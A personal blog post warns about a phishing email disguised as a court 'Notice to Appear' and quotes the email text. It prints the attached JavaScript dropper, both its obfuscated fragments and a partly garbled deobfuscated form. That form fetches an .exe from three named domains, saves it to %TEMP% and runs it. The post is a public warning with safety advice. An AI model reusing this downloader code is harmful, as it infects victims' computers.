Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.
This time the Javascript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.
Here’s the email that this came attached to:
|
Notice to Appear,You have to appear in the Court on the July 27.Please, prepare all the documents relating to the case and bring them to Court on the specified date.Note: The case may be heard by the judge in your absence if you do not come.You can review complete details of the Court Notice in the attachment.Sincerely,Jimmie Cowan,Clerk of Court.Attached: Notice_to_Appear_00928994.zip
function sah126() { return ’00) {‘; }; function sah125() { return ‘ == 2′; }; function sah210() { return ‘+fr+'; }; function sah86() { return ‘ar dn'; }; function sah105() { return ‘rea'; }; function sah95() { return ‘bj'; };
But as soon as the code runs, it concatenates all those little bits into something that looks like this:
var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
function gvi() { return ‘e'; }
function sah() { return ‘val'; }
function dl(fr)l”); v { var b = “w'; };
ww.startick.com mrflapper.com ihaveavoice2.com”.split'; };
(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };'; };
try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”
for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);
I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.
The bad actors want access to your data and your computer, and they don’t care how they get it.
Be careful out there.
The Old Wolf has spoken.
